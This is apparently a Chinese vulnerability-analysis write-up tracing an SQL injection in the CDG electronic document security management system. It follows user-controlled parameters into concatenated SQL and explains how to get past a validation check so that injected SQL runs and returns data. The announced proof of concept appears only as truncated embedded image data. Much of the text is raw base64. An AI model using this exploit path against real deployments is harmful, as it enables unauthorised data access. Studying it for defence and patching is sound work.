Vs9j6+i2u1DvVC14nOS8IltLzE5sc7vRfbhbtykGoPrfkAWnkM++8ojPbItWN/XgMAkf/9e5uGu1Ghe7mD0iavs3/bB60WilSfXGZL2lk2IFU+pezEg1GPiAvTy1ofqW+KvZ+/Fyn0IHj/QSMg3UWxu4KKi5pvlW/7IvNyMaMonflkyA/XavdTBvSoxKWuoTKGfjxGgZqL311OLq8e57D92KLKlfnN8OXJtzdvXCClpq0AFd/gQFDdKauPBbWspym5JZd0631+nvTSaT0vfoM3F3fUPLZ7+ASw6EjrDfeSW/1+O7UiIAPoGdgbjZWFxICIpLp3+10lWLJDeryDK1dKQApu7Ro1l78sH6EyH1yYL6hqriQmIqOhevJp/n19O9DZaLvnkVmI2SF+vcXkB1htsjDL4l+IWz+uckkEmmmd/arM8vM1AcI8AgpjbZzv5tIu1XrlSBtL2MpTbizy9FYQ1msP6lff3EVTYvlR0IzW1d8TXrwv0stRsoJ8fCKKWpPdT0ckvFTbaPjdLJOGJNIk48GHLZSExMbPvPku/LUG86jpURkdeYde11K3Yr6lIaCpyecTYZI8fOKqRo6eYZk/cyDkTuMh8E6rUq+sdF6+FDDJQf9Eku69mwioizK/5bp+h28zttVt1899Kk08OwWktOxE3S/CVSX/jZsqccBuSVbeJft1vb0Pvy2qCXmihc2To0r30/tKiFBSbQWzcLz1uvBc5MDCkBPRc1MVQIKkyJarb9JD1J32iR7hW6lXNSVXS2r15nKC4jcD6Hzt3mKL9mu4n7aNSA1v3VR1STGBS3avV92yd/9XXaN2H3dIy6Pvs2Xnf
|
|||
|
|
<p blockindex=25><strong>分析</strong>:调用 <code>this.getAuthoriseTempletList(userId, secretLevelId)</code> 方法来获取与指定用户和密级相关的 <code>CDGAuthoriseTempletInfo</code> 对象列表其中包含包括名称(<code>name</code>)、描述(<code>description</code>)、密级(<code>secretLevel</code>)、创建日期(<code>createDate</code>)。然后创建一个空的 <code>ArrayList</code> 类型的 <code>authoriseTempletList</code>,用于存储转换后的 <code>AuthoriseTemplet</code> 对象,将获取到的对象列表中的内容给到<code>AuthoriseTemplet</code> 对象之后返回这个对象</p>
|
|||
|
|
<p blockindex=26>我们进入到<code>getAuthoriseTempletList</code>方法中查看它是如何获取对象列表的</p>
|
|||
|
|
<p blockindex=27><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=28><strong>分析</strong>:该方法就是判断我们传递的<code>userId</code>、 <code>secretLevelId</code>是否为空,若不为空就将其拼接到sql语句中(猜测这就是sql注入漏洞形成的原因),之后调用<code>dao.getAuthoriseTempletList(sqls.toString())</code>将其结果返回</p>
|
|||
|
|
<p blockindex=29>进入到<code>List<CDGAuthoriseTempletInfo></code>下的<code>getAuthoriseTempletList</code>方法中,这里见我们转入的参数进行了sql语句的拼接后,调用了<code>dao.getAuthoriseTempletList</code>方法,这里有多个地方声明了该方法我们选择的是第一个</p>
|
|||
|
|
<p blockindex=30><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=31><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=32><strong>分析</strong>:该方法会将我们传入的参数直接拼接到sql语句中即(<code>sql.append(condtion)</code>),之后进行调用<code>getCommonResults(sql.toString())</code>方法执行sql语句的查询(并且没有任何过滤)并将结果赋值给maps,之后就是判断maps是否为空,将maps中的内容赋值给list,返回list。</p>
|
|||
|
|
<h2 blockindex=33>总结</h2>
|
|||
|
|
<p blockindex=34>经过以上分析我们已经确定了该漏洞的成因,</p>
|
|||
|
|
<ol blockindex=35>
|
|||
|
|
<li><code>CDGAuthoriseTempletModel</code>下的<code>getAuthoriseTempletList</code>方法---><code>List<AuthoriseTemplet>下的 getAuthoriseTempletList</code>方法,其中的参数就是我们可以控制的由前端传过来<code>UserId</code>和<code>SecretLevelId</code></li>
|
|||
|
|
<li><code>List<AuthoriseTemplet>下的 getAuthoriseTempletList</code>方法--><code>List<CDGAuthoriseTempletInfo></code>下的<code>getAuthoriseTempletList</code>方法,通过<code>sqls.append</code>将我们可以控制的参数进行sql语句的拼接</li>
|
|||
|
|
<li><code>List<CDGAuthoriseTempletInfo></code>下的<code>getAuthoriseTempletList</code>方法--><code>dao.getAuthoriseTempletList(sqls.toString())</code>只进行<code>getCommonResults</code>进而执行sql语句并将结果返回</li>
|
|||
|
|
</ol>
|
|||
|
|
<p blockindex=36>因此只要我们在前端传入的参数<code>UserId</code>是缓存中的内容或者是数据库中的存在的值进而绕过<code>validateInfo</code>的if校验,进入到else语句中,之后<code>SecretLevelId</code>传入我们恶意的sql语句,进入<code>getAuthoriseTempletList</code>方法中进行sql语句的执行,这样从而将我们想要的数据以xml的格式返回到响应中</p>
|
|||
|
|
<h3 blockindex=37>然后我们进行构造POC</h3>
|
|||
|
|
<p blockindex=38>电子文档安全管理系统(CDG)</p>
|
|||
|
|
<p blockindex=39><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABoAAAAJkCAYAAAAxweM1AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzddXxc153///fMSJoRM7MZZcvM7Dh2EgcccJgaNw20KaTb7Ra+3d12f9ttt9s2TRsGhxtyYsd2zGzHzGyLTGJmzfz+GGksWSNZMLLkyev5ePjxGF+ac+FczT2fez7HMHLkSJsAAAAAAAAAAADgNozdXQAAAAAAAAAAAAC4FgEgAAAAAAAAAAAAN0MACAAAAAAAAAAAwM0QAAIAAAAAAAAAAHAzBIAAAAAAAAAAAADcDAEgAAAAAAAAAAAAN0MACAAAAAAAAAAAwM0QAAIAAAAAAAAAAHAzBIAAAAAAAAAAAADcDAEgAAAAAAAAAAAAN0MACAAAAAAAAAAAwM0QAAIAAAAAAAAAAHAzBIAAAAAAAAAAAADcDAEgAAAAAAAAAAAAN0MACAAAAAAAAAAAwM0QAAIAAAAAAAAAAHAzBIAAAAAAAAAAAADcDAEgAAAAAAAAAAAAN0MACAAAAAAAAAAAwM0QAAIAAAAAAAAAAHAzBIAAAAAAAAAAAADcDAEgAAAAAAAAAAAAN0MACAAAAAAAAAAAwM0QAAIAAAAAAAAAAHAzBIAAAAAAAAAAAADcDAEgAAAAAAAAAAAAN0MACAAAAAAAAAAAwM0QAAIAAAAAAAAAAHAzBIAAAAAAAAAAAADcDAEgAAAAAAAAAAAAN+PR3QVAz2IymeTlZXY6r85ap+qqqmtcIjjj7e2jwUNTlJmRrksXL3R3ca45o9Eos9ni+H9lZYVsNluL090Zx+L65OXlJZPJQ1abVVWVla0uS33nGu9pOCfXn8bnprq6SnV1dS7dvtlikdHg/L2yqqpKWa1Wl37ft4WX2SyT0SRJqq2tVU1NtZPpNaqpqem2MraFu+wHAAAAcD0iAORiFm9vDRk6XPGJSQoMCpF/QIDKy8pUVJivc1mZ2r1ze48OogweOkz3PPCo03npZ8/o5b/96RqXCM7cee8DGjBoqGpravX73/5SZaWl3V2kayo6JlZPPfdTx/9/9+ufqaysTDGxcfreD56XJNlsNv3qX55rc+Ojn5+/gkNDJUm52dmqqCh3fcFb4OnpqaTk3krs1VtJyX1UXV2ltDOnlH72tDIz0lttOOuKY4Gud9